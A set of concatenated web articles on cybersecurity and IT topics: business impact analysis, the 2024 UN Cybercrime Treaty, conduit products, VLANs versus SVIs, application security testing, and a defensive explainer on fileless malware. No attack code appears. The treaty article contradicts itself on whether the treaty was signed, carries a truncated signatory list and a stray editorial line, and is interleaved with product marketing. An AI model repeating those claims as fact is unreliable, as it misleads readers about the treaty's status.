The research highlights the importance of secure practices like using key-based authentication and strong passwords. As attackers grow increasingly tenacious and innovative, novel defensive approaches will be essential to maintaining a safe internet ecosystem.
Secure your emails in a heartbeat! To find your ideal email security vendor, Take a Free 30-Second Assessment. | <urn:uuid:33d90416-9a8c-4854-a120-a0422eb47a29> | CC-MAIN-2024-38 | https://gbhackers.com/alert-brute-force-ssh-attacks-rampant-in-the-wild/ | 2024-09-13T12:41:18Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00556.warc.gz | en | 0.923433 | 737 | 2.78125 | 3 |
Disruptions can be devastating for businesses of all sizes and sectors.
From natural disasters to cyber attacks, a single incident can lead to a myriad of risks that can drastically disrupt operations, impact financial performance, and leave a company’s reputation in tatters.
The ability to withstand these challenges and maintain business continuity is critical to long-term success, so it’s important to understand what a worst-case scenario looks like so you can spring into action if needed.
That’s where a business impact analysis (BIA) comes in. BIA tells you what to expect when unforeseen roadblocks occur, so you can make a plan to get your business back on track as quickly as possible.
This article tells you everything you need to know about business impact analysis, including what it is, how it works, and why it’s important.
What is Business Impact Analysis (BIA)?
Business Impact Analysis (BIA) is a structured process used to identify and quantify the potential consequences of a disruption to critical business operations. This analysis helps organizations understand the potential financial, operational, and reputational risks associated with such disruptions.
A business impact analysis helps you predict the consequences of disruptions to business processes, so you have the data you need to proactively create recovery strategies. For example, a manufacturing company could create a BIA to measure how losing a key supplier would affect company operations and revenue.
BIA helps identify which processes, systems, and data are most critical to the business's survival, allowing organizations to allocate resources and focus on mitigating the most significant risks.
By understanding the potential consequences of disruptions, organizations can make informed decisions about their risk management strategies, including disaster recovery planning, insurance coverage, and business continuity plans.
Why is business impact analysis important?
In many industries, BIA is a regulatory requirement. It helps organizations demonstrate their commitment to risk management and compliance and is crucial for enabling them to respond appropriately when disruptive incidents strike.
A thorough BIA can help organizations become more resilient to disruptions, reducing the likelihood of significant financial losses and reputational damage.
It allows organizations to understand the potential impacts of disruptions so they can develop concrete incident response strategies to minimize downtime and recover quickly.
How does BIA work?
1. Identification of Critical Processes
The first step of BIA is to identify the processes that are essential for the organization's continued operations. This involves determining which processes are essential for the organization's continued operations and survival. These processes are often referred to as "mission-critical" or "core business processes."
2. Assessment of Potential Disruptions
Once critical processes have been identified, organizations must assess the potential disruptions that could impact them. This includes natural disasters (e.g., hurricanes, earthquakes), human-caused incidents (e.g., cyber attacks, sabotage), and other factors (e.g., supply chain disruptions, economic downturns).
Once these disruptions have been identified, organizations must then evaluate how these disruptions could disrupt the organization's critical business processes. This assessment helps organizations understand the range of potential threats they face and prioritize their risk mitigation efforts.
3. Quantification of Impact
For each potential disruption, organizations need to quantify the potential financial, operational, and reputational consequences. This may involve estimating the cost of lost revenue, increased expenses, damage to equipment, and damage to the organization's reputation.
By quantifying the impact of disruptions, organizations can prioritize risks, allocate resources effectively, and develop appropriate risk mitigation strategies.
4. Setting Recovery Time Objectives (RTOs) and Recovery Point Objectives (RPOs)
RTOs and RPOs are essential elements of a Business Impact Analysis (BIA). They provide a quantitative measure of the acceptable levels of downtime and data loss for critical business processes, specifying how quickly the organization can restore operations after a disruption, and the maximum amount of data loss that can be tolerated.
Setting appropriate RTOs and RPOs is essential for developing effective disaster recovery and business continuity plans. Organizations must carefully consider the potential impact of downtime and data loss on their operations, reputation, and financial performance.
5. Development of Recovery Strategies
Based on the identified risks and recovery objectives, organizations can develop recovery strategies to minimize the impact of disruptions. These strategies are designed to minimize the negative consequences of disruptions and ensure that the organization can resume normal operations as quickly as possible.
The first step in developing recovery strategies is to identify the specific actions that need to be taken to restore critical processes. This may involve restoring data from backups, relocating operations to a secondary site, or procuring necessary supplies. Once these actions have been identified, organizations can develop detailed recovery plans that outline the steps involved, the resources required, and the responsibilities of different teams.
Organizations may also need to invest in redundant systems and processes to minimize the impact of disruptions, including having backup servers, multiple suppliers, and disaster recovery sites. By investing in these measures, organizations can reduce their reliance on a single point of failure and improve their resilience.
Business impact analysis vs risk assessment
While both BIA and risk assessment are essential components of risk management, they serve distinct purposes. A risk assessment identifies potential threats and vulnerabilities that could impact an organization. BIA, on the other hand, focuses on the consequences of these threats, quantifying the potential financial, operational, and reputational damages.
In essence, a risk assessment analysis identifies the "what" of risk, while BIA determines the "so what" by evaluating the potential impact of identified risks.
Examples of business impact analysis
A healthcare organization might conduct a BIA to assess the impact of a power outage on patient care, critical systems, and data security. This would involve identifying critical processes like patient monitoring, medication administration, and electronic health record systems. The BIA would help determine the potential consequences of a power outage, such as delayed treatments, loss of data, and increased costs.
A manufacturing company could use BIA to evaluate the impact of a natural disaster, such as a hurricane, on its supply chain and production facilities. This would involve identifying critical suppliers, transportation routes, and manufacturing processes. The BIA would help determine the potential consequences of a disaster, such as production delays, increased costs, and damage to equipment.
3. Financial Services
A financial institution might conduct a BIA to assess the impact of a cyberattack on its customer data and operations. This would involve identifying critical systems like online banking, payment processing, and data storage. The BIA would help determine the potential consequences of a cyber attack, such as financial losses, reputational damage, and regulatory fines.
A retail company might use BIA to evaluate the impact of a major system failure on its sales and customer service. This would involve identifying critical systems like point-of-sale terminals, inventory management, and customer relationship management. The BIA would help determine the potential consequences of a system failure, such as lost sales, customer dissatisfaction, and operational disruptions.
In each of these examples, BIA helps organizations identify critical processes, assess potential disruptions, and quantify the potential consequences. This information can then be used to develop effective risk mitigation strategies and ensure business continuity. | <urn:uuid:70e4c794-5f49-4f17-a58d-8c16a6c0337b> | CC-MAIN-2024-38 | https://em360tech.com/tech-article/what-is-business-impact-analysis-bia | 2024-09-14T17:48:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00456.warc.gz | en | 0.93771 | 1,481 | 2.75 | 3 |
Cybercrime Treaty at the UN: A New Era in Global Security
UN Cybersecurity Treaty Establishes Global Cooperation
The UN has actively taken a historic step by agreeing on the first-ever global cybercrime treaty. This significant agreement, outlined by the United Nations, demonstrates a commitment to enhancing global cybersecurity. The treaty paves the way for stronger international collaboration against the escalating threat of cyberattacks. As we examine this treaty’s implications, it becomes clear why this decision is pivotal for the future of cybersecurity worldwide.
Cybercrime Treaty Addresses Global Cybersecurity Threats
As cyberattacks surge worldwide, UN member states have recognized the urgent need for collective action. This realization led to the signing of the groundbreaking Cybercrime Treaty on August 9, 2024. The treaty seeks to harmonize national laws and strengthen international cooperation. This effort enables countries to share information more effectively and coordinate actions against cybercriminals.
After years of intense negotiations, this milestone highlights the complexity of today’s digital landscape. Only a coordinated global response can effectively address these borderless threats.
Cybersecurity experts view this agreement as a crucial advancement in protecting critical infrastructures. Cyberattacks now target vital systems like energy, transportation, and public health. International cooperation is essential to anticipate and mitigate these threats before they cause irreparable harm.
For further details, you can access the official UN publication of the treaty here.
Drawing Parallels with the European AI Regulation
To grasp the full importance of the Cybercrime Treaty, we can compare it to the European Union’s initiative on artificial intelligence (AI). Like cybercrime, AI is a rapidly evolving field that presents new challenges in security, ethics, and regulation. The EU has committed to a strict legislative framework for AI, aiming to balance innovation with regulation. This approach protects citizens’ rights while promoting responsible technological growth.
In this context, the recent article on European AI regulation offers insights into how legislation can evolve to manage emerging technologies while ensuring global security. Similarly, the Cybercrime Treaty seeks to create a global framework that not only prevents malicious acts but also fosters essential international cooperation. As with AI regulation, the goal is to navigate uncharted territories, ensuring that legislation keeps pace with technological advancements while safeguarding global security.
A Major Step Toward Stronger Cybersecurity
This agreement marks a significant milestone, but it is only the beginning of a long journey toward stronger cybersecurity. Member states now need to ratify the treaty and implement measures at the national level. The challenge lies in the diversity of legal systems and approaches, which complicates standardization.
The treaty’s emphasis on protecting personal data is crucial. Security experts stress that fighting cybercrime must respect fundamental rights. Rigorous controls are essential to prevent abuses and ensure that cybersecurity measures do not become oppressive tools.
However, this agreement shows that the international community is serious about tackling cybercrime. The key objective now is to apply the treaty fairly and effectively while safeguarding essential rights like data protection and freedom of expression.
The Role of DataShielder and PassCypher Solutions in Individual Sovereignty and the Fight Against Cybercrime
As global cybercrime threats intensify, innovative technologies like DataShielder and PassCypher are essential for enhancing security while preserving individual sovereignty. These solutions, which operate without servers, databases, or user accounts, provide end-to-end anonymity and adhere to the principles of Zero Trust and Zero Knowledge.
- DataShielder NFC HSM: Utilizes NFC technology to secure digital transactions through strong authentication, preventing unauthorized access to sensitive information. It operates primarily within the Android ecosystem.
- DataShielder HSM PGP: Ensures the confidentiality and protection of communications by integrating PGP technology, thereby reinforcing users’ digital sovereignty. This solution is tailored for desktop environments, particularly on Windows and Mac systems.
- DataShielder NFC HSM Auth: Specifically designed to combat identity theft, this solution combines NFC and HSM technologies to provide secure and anonymous authentication. It operates within the Android NFC ecosystem, focusing on protecting the identity of order issuers against impersonation.
- PassCypher NFC HSM: Manages passwords and private keys for OTP 2FA (TOTP and HOTP), ensuring secure storage and access within the Android ecosystem. Like DataShielder, it functions without servers or databases, ensuring complete user anonymity.
- PassCypher HSM PGP: Features patented, fully automated technology to securely manage passwords and PGP keys, offering advanced protection for desktop environments on Windows and Mac. This solution can be seamlessly paired with PassCypher NFC HSM to extend security across both telephony and computer systems.
- PassCypher HSM PGP Gratuit: Offered freely in 13 languages, this solution integrates PGP technology to manage passwords securely, promoting digital sovereignty. Operating offline and adhering to Zero Trust and Zero Knowledge principles, it serves as a tool of public interest across borders. It can also be paired with PassCypher NFC HSM to enhance security across mobile and desktop platforms.
Global Alignment with UN Cybercrime Standards
Notably, many countries where DataShielder and PassCypher technologies are protected by international patents have already signed the UN Cybercrime Treaty. These nations include the USA, China, South Korea, Japan, the UK, Germany, France, Spain, and Italy. This alignment highlights the global relevance of these solutions, emphasizing their importance in meeting the cybersecurity standards now recognized by major global powers. This connection between patent protection and treaty participation further underscores the critical role these technologies play in the ongoing efforts to secure digital infrastructures worldwide.
DataShielder solutions can be classified as dual-use products, meaning they have both civilian and military applications. This classification aligns with international regulations, particularly those discussed in dual-use encryption regulations. These products, while enhancing cybersecurity, also comply with strict regulatory standards, ensuring they contribute to both individual sovereignty and broader national security interests.
Moreover, these products are available exclusively in France through AMG PRO, ensuring that they meet local market needs while maintaining global standards.
Human Rights Concerns Surrounding the Cybercrime Treaty
Human rights organizations have voiced strong concerns about the UN Cybercrime Treaty. Groups like Human Rights Watch and the Electronic Frontier Foundation (EFF) argue that the treaty’s broad scope lacks sufficient safeguards. They fear it could enable governments to misuse their authority, leading to excessive surveillance and restrictions on free speech, all under the guise of combating cybercrime.
These organizations warn that the treaty might be exploited to justify repressive actions, especially in countries where freedoms are already fragile. They are advocating for revisions to ensure stronger protections against such abuses.
The opinion piece on Euractiv highlights these concerns, warning that the treaty could become a tool for repression. Some governments might leverage it to enhance surveillance and limit civil liberties, claiming to fight cybercrime. Human rights defenders are calling for amendments to prevent the treaty from becoming a threat to civil liberties.
Global Reactions to the Cybercrime Treaty
Reactions to the Cybercrime Treaty have been varied, reflecting the differing priorities and concerns across nations. The United States and the European Union have shown strong support, stressing the importance of protecting personal data and citizens’ rights in the fight against cybercrime. They believe the treaty provides a critical framework for international cooperation, which is essential to combat the rising threat of cyberattacks.
However, Russia and China, despite signing the treaty, have expressed significant reservations. Russia, which initially supported the treaty, has recently criticized the final draft. Officials argue that the treaty includes too many human rights safeguards, which they believe could hinder national security measures. China has also raised concerns, particularly about digital sovereignty. They fear that the treaty might interfere with their control over domestic internet governance.
Meanwhile, countries in Africa and Latin America have highlighted the significant challenges they face in implementing the treaty. These nations have called for increased international support, both in resources and technical assistance, to develop the necessary cybersecurity infrastructure. This call for help underscores the disparity in technological capabilities between developed and developing nations. Such disparities could impact the treaty’s effectiveness on a global scale.
These varied reactions highlight the complexity of achieving global consensus on cybersecurity issues. As countries navigate their national interests, the need for international cooperation remains crucial. Balancing these factors will be essential as the global community moves forward with implementing the Cybercrime Treaty (UNODC) (euronews).
Broader Context: The Role of European Efforts and the Challenges of International Cooperation
While the 2024 UN Cybercrime Treaty represents a significant step forward in global cybersecurity, it is essential to understand it within the broader framework of existing international agreements. For instance, Article 62 of the UN treaty requires the agreement of at least 60 parties to implement additional protocols, such as those that could strengthen human rights protections. This requirement presents a challenge, especially considering that the OECD, a key international body, currently has only 38 members, making it difficult to gather the necessary consensus.
In Europe, there is already an established framework addressing cybercrime: the Budapest Convention of 2001, under the Council of Europe. This treaty, which is not limited to EU countries, has been a cornerstone in combating cybercrime across a broader geographic area. The Convention has been instrumental in setting standards for cooperation among signatory states.
Furthermore, an additional protocol to the Budapest Convention was introduced in 2022. This protocol aims to address contemporary issues in cybercrime, such as providing a legal basis for the disclosure of domain name registration information and enhancing cooperation with service providers. It also includes provisions for mutual assistance, immediate cooperation in emergencies, and crucially, safeguards for protecting personal data.
However, despite its importance, the protocol has not yet entered into force due to insufficient ratifications by member states. This delay underscores the difficulties in achieving widespread agreement and implementation in international treaties, even when they address pressing global issues like cybercrime.
Timeline from Initiative to Treaty Finalization
The timeline of the Cybercrime Treaty reflects the sustained effort required to address the growing cyber threats in an increasingly unstable global environment. Over five years, the negotiation process highlighted the challenges of achieving consensus among diverse nations, each with its own priorities and interests. This timeline provides a factual overview of the significant milestones:
- 2018: Initial discussions at the United Nations.
- 2019: Formation of a working group to assess feasibility.
- 2020: Proposal of the first draft, leading to extensive negotiations.
- 2021: Official negotiations involving cybersecurity experts and government representatives.
- 2023: Agreement on key articles; the final draft was submitted for review.
- 2024: Conclusion of the treaty text during the final session of the UN Ad Hoc Committee on August 8, 2024, in New York. The treaty is set to be formally adopted by the UN General Assembly later this year.
This timeline underscores the complexities and challenges faced during the treaty’s formation, setting the stage for understanding the diverse global responses to its implementation.
List of Treaty Signatories
The Cybercrime Treaty has garnered support from a coalition of countries committed to enhancing global cybersecurity. The current list of countries that have validated the agreement includes:
- United States
- United Kingdom
- South Korea
These countries reflect a broad consensus on the need for international cooperation against cybercrime. However, it is important to note that the situation is fluid, and other countries may choose to sign the treaty in the future as international and domestic considerations evolve.
Differentiating the EU’s Role from Member States’ Participation
It is essential to clarify that the European Union as a whole has not signed the UN Cybercrime Treaty. Instead, only certain individual EU member states, such as Germany, France, Spain, and Italy, have opted to sign the treaty independently. This means that while the treaty enjoys support from some key European countries, its enforcement and application will occur at the national level within these countries rather than under a unified EU framework.
This distinction is significant for several reasons. First, it highlights that the treaty will not be universally enforced across the entire European Union. Each signing member state will be responsible for integrating the treaty’s provisions into their own legal systems. Consequently, this could result in variations in how the treaty is implemented across different European countries.
Moreover, the European Union has its own robust cybersecurity policies and initiatives, including the General Data Protection Regulation (GDPR) and the EU Cybersecurity Act. The fact that the EU as an entity did not sign the treaty suggests that it may continue to rely on its existing frameworks for governing cybersecurity. At the same time, individual member states will address cybercrime through the treaty’s provisions.
Understanding this distinction is crucial for recognizing how international cooperation will be structured and the potential implications for cybersecurity efforts both within the EU and on a global scale.
Countries Yet to Sign the Cybercrime Treaty
Several countries have opted not to sign the Cybercrime Treaty, citing concerns related to sovereignty and national security. In a world marked by conflicts and global tensions, these nations prioritize maintaining control over their cybersecurity strategies rather than committing to international regulations. This list includes:
- Turkey: Concerns about national security and digital sovereignty.
- Iran: Fears of surveillance by more powerful states.
- Saudi Arabia: Reservations about alignment with national cyber policies.
- Israel: Prefers relying on its cybersecurity infrastructure, questioning enforceability.
- United Arab Emirates: Concerns about sovereignty and external control.
- Venezuela: Fear of foreign-imposed digital regulations.
- North Korea: Potential interference with state-controlled internet.
- Cuba: Concerns over state control and national security.
- Andorra: Has not signed the treaty, expressing caution over how it may impact national sovereignty and its control over digital governance and cybersecurity policies.
While these countries have not signed the treaty, the situation may change. International pressures, evolving cyber threats, and diplomatic negotiations could lead some of these nations to reconsider their positions and potentially sign the treaty in the future.
Download the Full Text of the UN Cybercrime Treaty
For those interested in reviewing the full text of the treaty, you can download it directly in various languages through the following links:
- EN: UN Cybercrime Treaty – English
- FR: UN Cybercrime Treaty – French
- AR: UN Cybercrime Treaty – Arabic
- CN: UN Cybercrime Treaty – Chinese
- ES: UN Cybercrime Treaty – Spanish
- RU: UN Cybercrime Treaty – Russian
These documents provide the complete and official text of the treaty, offering detailed insights into its provisions, objectives, and the framework for international cooperation against cybercrime.
Global Implications and Challenges
This title more accurately reflects the content, focusing on the broader global impact of the treaty and the challenges posed by the differing approaches of signatory and non-signatory countries. It invites the reader to consider the complex implications of the treaty on international cybersecurity cooperation and state sovereignty.
A Global Commitment to a Common Challenge
As cyberattacks become increasingly sophisticated, the Cybercrime Treaty offers a much-needed global response to this growing threat. The UN’s agreement on this treaty marks a critical step toward enhancing global security. However, much work remains to ensure collective safety and effectiveness. Furthermore, concerns raised by human rights organizations, including Human Rights Watch and the Electronic Frontier Foundation, emphasize the need for vigilant monitoring. This careful oversight is crucial to prevent the treaty from being misused as a tool for repression and to ensure it upholds fundamental freedoms.
In this context, tools like DataShielder offer a promising way forward. These technologies enhance global cybersecurity efforts while simultaneously respecting individual and sovereign rights. They serve as a model for achieving robust security without infringing on the essential rights and freedoms that are vital to a democratic society. Striking this balance is increasingly important as we navigate deeper into a digital age where data protection and human rights are inextricably linked.
For additional insights on the broader implications of this global agreement, you can explore the UNRIC article on the Cybercrime Treaty. | <urn:uuid:bba1f114-3110-41ba-9c4a-6e5d0fd722c2> | CC-MAIN-2024-38 | https://freemindtronic.com/tag/global-cybersecurity/ | 2024-09-14T17:13:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00456.warc.gz | en | 0.91472 | 3,286 | 2.75 | 3 |
MicroTechnology is a term given to smaller conduits and fiber used in Inside and Outside Plant Construction (ISP and OSP). MicroDucts were developed as a solution to house fiber cables that were smaller in size, but still carried significant capacity. Today, MicroCables range from 6 to 432-fiber counts. The glass fibers are the same type as those used in traditional fiber cables, only the cable design has been altered to reduce the diameter of the cable sheath and support system. MicroDucts bundled under one sheath are called FuturePath and provide multiple ducts in one structure for future expansion of networks.
Dura-Line manufactures standard High Density Polyethylene (HDPE) conduits for standard installation applications such as standard underground, as innerducts in existing conduits, or corrugated products to use in congested areas. HDPE is a flexible and resilient material. It provides superior resistance to natural or mechanical damage, and has excellent low temperature properties to handle cold weather.
Dura-Line's Speciality Conduits are designed and manufactured to perform to meet application-specfic requirements such as aerial, locatable, providing superior mechanical protection, and fire resistant spaces. Customers using Specialty products leverage the unique characteristics for particular projects.
To complete your installation, Dura-Line offers a complete line of Accessories and additional tools to make installations easier. Couplers, with properties designed for air-jetting, plow chutes, and other installations, easily join lengths of Conduits and MicroDucts. Lubricants in a variety of formulations, including high performance in cold weather, aid in cable placement. MicroAccessories include couplers, end caps, and speciality items designed to perform with MicroDucts and FuturePath. Bull-Line Pull Tape can help install both conduit and cables inside conduit.
These Applications demonstrate how conduit is used in everyday life throughout our modern world. Considered an integral part of the construction phase, the long-term return on investment on installing a flexible, easily scalable conduit network system is priceless. Multiple industries rely on clear, consistent, reliable communication technology. Learn more about how Dura-Line products are integral in providing connection.
Dura-Line prides itself on creating cutting edge technology that solves unique customer installation scenarios. For nearly half a century, our team of experts has been hands-on involved in product research and installation training. In the Tech Center section, we share tips and techniques intended to help and engage engineers, installation crews, and end-users.
To complete your installation, Dura-Line offers a complete line of Accessories and additional tools to make installations easier. | <urn:uuid:303448b8-d2ab-4895-82c7-2b3c5056545b> | CC-MAIN-2024-38 | https://www.duraline.com/accessory-form/?Subject=Bull-Line+Bucket | 2024-09-14T17:34:14Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00456.warc.gz | en | 0.91002 | 549 | 2.671875 | 3 |
What is VLAN (Virtual Local Area Network)
A virtual LAN or VLAN is any broadcast domain that is segregated and isolated at the data link layer OSI layer 2. VLANs reduce the load on a network by keeping local traffic within a VLAN. However, because each type VLAN its own domain, a mechanism is needed for VLANS to pass data to other VLANS without passing the data through a router.
The solution is SVI networking i.e. switched virtual interface.
Related – VLAN vs Subnet
What is SVI (Switched Virtual Interface)
An SVI interface is usually found on Layer 3 switches. With SVIs the switch recognizes the packet destinations that are local to the sending VLAN and then routes packets destined for different VLANs.
An SVI interface can be created for each VLAN that exists but only one SVI can be mapped to each VLAN. An SVI is virtual and has no physical port defined and performs the same functions for the VLAN as a router interface. SVI is also called Interface VLAN.
Comparison Table: VLAN vs SVI
Below table summarizes the differences between the two:
PARAMETER | SVI | VLAN |
Abbreviation for | Switched Virtual Interface | Virtual Local Area Network |
Platform support | Only configurable on Layer 3 devices. | Can be configured on Layer 3 and Layer 2 devices |
Routing across IP subnets | SVI can perform routing across IP subnets | Cannot perform Routing between VLANs |
Configuration | Interface VLAN (VLAN ID) | Can be enabled via following command: VLAN (VLAN ID) |
OSI Layer | Works on Layer 3 of OSI Model | Works on Layer 2 of OSI Model |
Are you preparing for your next interview?
If you want to learn more about VLAN, then check our e-book on VLAN System Interview Questions and Answers in easy to understand PDF Format explained with relevant Diagrams (where required) for better ease of understanding.
ABOUT THE AUTHOR
I am here to share my knowledge and experience in the field of networking with the goal being – “The more you share, the more you learn.”
I am a biotechnologist by qualification and a Network Enthusiast by interest. I developed interest in networking being in the company of a passionate Network Professional, my husband.
I am a strong believer of the fact that “learning is a constant process of discovering yourself.”
– Rashmi Bhardwaj (Author/Editor) | <urn:uuid:ce520e52-5459-4379-b7fb-e6c33dca4d8a> | CC-MAIN-2024-38 | https://ipwithease.com/vlan-vs-svi/ | 2024-09-15T23:14:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00356.warc.gz | en | 0.898707 | 543 | 3.4375 | 3 |
As a developer, you need to be familiar with various security measures to protect your applications from potential vulnerabilities. Among the security testing techniques that you need to be aware of are Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), Interactive Application Security Testing (IAST), and Runtime Application Self-Protection (RASP).
SAST: Static Application Security Testing
SAST is a type of security testing that analyzes an application’s source code or compiled bytecode to identify potential security vulnerabilities. SAST is usually performed in the early stages of software development, making it an essential tool for developers to prevent vulnerabilities from being introduced into the application’s code. The primary advantage of SAST is that it can detect vulnerabilities in the source code before the application is deployed.
DAST: Dynamic Application Security Testing
DAST is a type of security testing that examines an application’s running state to identify vulnerabilities. It involves sending requests to the application to simulate real-world attacks and identify potential vulnerabilities. The primary advantage of DAST is that it can detect vulnerabilities in the application’s runtime environment that might have been missed by SAST.
IAST: Interactive Application Security Testing
IAST is a type of security testing that combines elements of both SAST and DAST. It examines the application’s running state like DAST, but it also provides more in-depth insights into the application’s code like SAST. IAST can detect vulnerabilities in the code as well as the runtime environment, making it an essential tool for developers to prevent vulnerabilities from being introduced into the code.
RASP: Runtime Application Self-Protection
RASP is a type of security testing that monitors an application’s runtime behavior to identify potential attacks and take appropriate action. It is usually deployed as an agent within the application’s runtime environment, allowing it to monitor and protect the application against various attacks. RASP can detect and block attacks in real-time, making it an essential tool for applications that handle sensitive data.
As a developer, you need to be familiar with various security testing techniques like SAST, DAST, IAST, and RASP. Each of these techniques has its strengths and weaknesses, and you need to determine which technique to use based on your application’s requirements. By being familiar with these techniques, you can better protect your application against potential vulnerabilities and provide a more secure experience for your users. | <urn:uuid:e546dcff-4560-4256-bd02-fb4ef3fafc3f> | CC-MAIN-2024-38 | https://cyberexperts.com/what-developers-need-to-know-about-sast-dast-iast-and-rasp/?utm_source=linkedin&utm_medium=social&utm_campaign=ReviveOldPost | 2024-09-18T10:42:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00156.warc.gz | en | 0.930815 | 509 | 3.078125 | 3 |
Malware is as old as computing itself. But as with all cyberthreats, it has evolved to be more effective and efficient. Fileless malware is one of the more pernicious threats to come along. In fact, it was identified as “the most common critical-severity cybersecurity threat to endpoints” for the first half of 2020.
What makes fileless malware so insidious is that it hides in a system’s RAM and effectively turns the computer’s operating system against the user by piggybacking on the tools that are part of their daily workflow. Worse, it thwarts traditional detection tools and methods because it has no identifiable code or signature.
Fileless malware is one of the most challenging threats businesses face today. Understanding what it is, how it works, and how to recognize such an attack is essential to mounting an effective defense.
[Related Reading: What Is Endpoint Security?]
What is Fileless Malware?
Finding malware exploits can sometimes feel like a game of Whac-A-Mole. No sooner is a malware signature identified, users notified, and patches applied, then a new exploit or a variation of an existing exploit appears.
What complicates things is that malware can also be “fileless.” There is no typical “.exe” binary file with a signature to be identified. Malware has typically used files that it makes resident on a target machine to carry out an attack, but a fileless malware attack does not touch the disk of the target. Instead, a hacker can leverage applications that are already installed on a computer, loading malicious code instructions only into memory.
Imagine opening a document that runs a macro or clicking on a website link to launch a video. That one action could cause, in one example, a malicious PowerShell script to be launched that might delete or damage files or launch the first stage of a more protracted and damaging attack.
The Rise of Fileless Malware
Fileless malware attacks aren’t new. In fact, this sort of malware has been seen for at least 15 years. The Lehigh virus was an example of this technique. The virus was carried in a maliciously altered DOS system file with the malicious code and the payload running in memory. It would run a command-line script to overwrite the boot sector of a machine, preventing the target from booting.
But recently there’s been an alarming rise in fileless malware exploits. Fileless attacks grew by 256 percent over the first half of 2019, and that trend has continued, with fileless malware responsible for 30 percent of all detected Indicators of compromise (IOCs) from January 1st to June 30th, 2020.
Businesses need to take this growing threat seriously because such attacks leave no detectable signature. Thus, they’re an ideal catalyst for advanced persistent threats where unauthorized users slip into a network unnoticed and implement their attack in phases over weeks or months to extract the maximum amount of data.
How Does Fileless Malware Work?
To understand fileless malware, it helps to contrast it with its more conventional form. In a typical malware attack, a user gets fooled into downloading an infected document or clicking a link to a fraudulent website, and a malicious file is written to the computer’s disk. That file can be detected during antivirus scanning, and it will leave a breadcrumb trail in the form of remnant code that you can follow to review its behavior and uncover any damage it may have done.
Fileless malware relies on stealth. Instead of writing a malicious file to disk, it hides in the system’s RAM where it can leverage authorized programs and processes to run its malicious code. Because antivirus tools look for file footprints and don’t scan memory directly, fileless attacks easily evade detection.
Like conventional malware attacks, a typical fileless attack starts with a user action. The user downloads an infected attachment or clicks on a malicious link. From there, an exploit kit scans the computer looking for vulnerabilities to gain entry into the system. Once inside, fileless malware hijacks whitelisted applications and protocols like Java, Microsoft Word, and Adobe Acrobat, or native tools like Windows Management Instrumentation and Microsoft PowerShell. PowerShell attacks are one of the most common, accounting for 89 percent of fileless malware attacks. In one notorious example, Operation Cobalt Kitty, PowerShell was used to target an Asian company for nearly 6 months after a spear-phishing email was used to infect over 40 PCs and servers.
Once fileless malware has compromised one of these trusted tools, the attacker will leverage it to execute malicious code in the infected system. The attacker can then surreptitiously move through the network, compromising and exfiltrating critical data, using these “safe” applications to hide their presence. Once fileless malware gets a foothold in the system, it may try to remain there using persistence mechanisms like hiding malicious code in the system registry or using native tools like Windows Task Scheduler to automatically reinfect the system at predetermined times.
Hackers can employ these attacks to perform a range of malicious activities including encrypting and exfiltrating data and compromising other systems in the environment. The most critical thing to remember about fileless malware, though, is that it leaves no obvious footprint. How then do you discover and stop a fileless attack?
How to Detect Fileless Malware
Because fileless malware attacks target the trusted tools used daily by virtually every enterprise, they are exceedingly difficult to deal with. Effective defense and detection require a combination of old-fashioned prevention and cutting-edge technology.
The best way to handle such attacks is to not allow the malware into your systems in the first place. As with many threats, fileless malware relies in part on unpatched applications and software or hardware vulnerabilities to gain entry. Keeping on top of updates and patches is essential for limiting the number of potential entry points attackers can exploit.
Fileless attackers also use phishing and social engineering to deposit their payloads. That makes cybersecurity awareness training for your staff critical. Emphasizing basic security practices such as visiting only secure websites and training employees to exercise extreme caution when opening email attachments can go a long way toward keeping fileless malware at bay.
But in a threat landscape that changes rapidly, one hundred percent immunity from attacks is impossible. Since signature-, rule, and scan-based detection is useless against fileless malware, looking for anomalous behavior is the best way to ferret out these threats.
Instead of looking for malicious files, behavioral analysis identifies out-of-the-ordinary and suspicious activity. A user accessing databases they never have previously or logging in at unusual hours could indicate compromise due to fileless malware. An endpoint protection platform that uses machine-learning driven behavioral analytics can identify what’s normal behavior for users and applications in real-time and flag suspect activity for further investigation can prevent or limit the damage caused by fileless attacks.
Extended Endpoint Protection
Typical endpoint protection solutions use machine learning to generate models every 4 to 6 months to identify malicious files before they execute. The problem with this approach is that businesses must manage decreasing accuracy over time and deal with false positives.
In simple terms, it would be great that before any application, binary, video, or whatever is executed, a super-fast check could be made to look for a “goodware” or “badware” signature. If there is no signature then, somehow run an automated check, leveraging responsive machine learning to help decide what to do.
Unlike solutions that generate models every 4 to 6 months to identify malicious files, Alert Logic Extended Endpoint Protection automatically gathers thousands of samples a day and uses machine learning to analyze these samples to improve coverage and accuracy.
Customers then transparently receive new models to get the best protection. The end result is fewer false positives because the model has already been trained with the specific software that customers are running.
From the perspective of the end-user, this protection adds 1/5 of a second to the time it takes to open an application. The negligible difference in performance is worth the added protection and probably beats Whac-A-Mole any day.
Alert Logic’s endpoint protection intelligently blocks attacks through a combination of machine-learning and attribute analysis, and real-time behavior analysis and provides deep CPU-level visibility without impacting performance. Our next-generation endpoint coverage dynamically combines machine-learning and behavior indicators to identify and block malicious techniques and malware in real-time.
You can learn more about Alert Logic Extended Endpoint Protection here: https://www.alertlogic.com/why-alert-logic/comprehensive-coverage/extended-endpoint-protection/ | <urn:uuid:18218b01-eb11-4622-b48e-fc36be2ee131> | CC-MAIN-2024-38 | https://www.alertlogic.com/blog/how-to-prevent-fileless-malware-attacks/ | 2024-09-18T11:04:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00156.warc.gz | en | 0.922598 | 1,801 | 2.671875 | 3 |
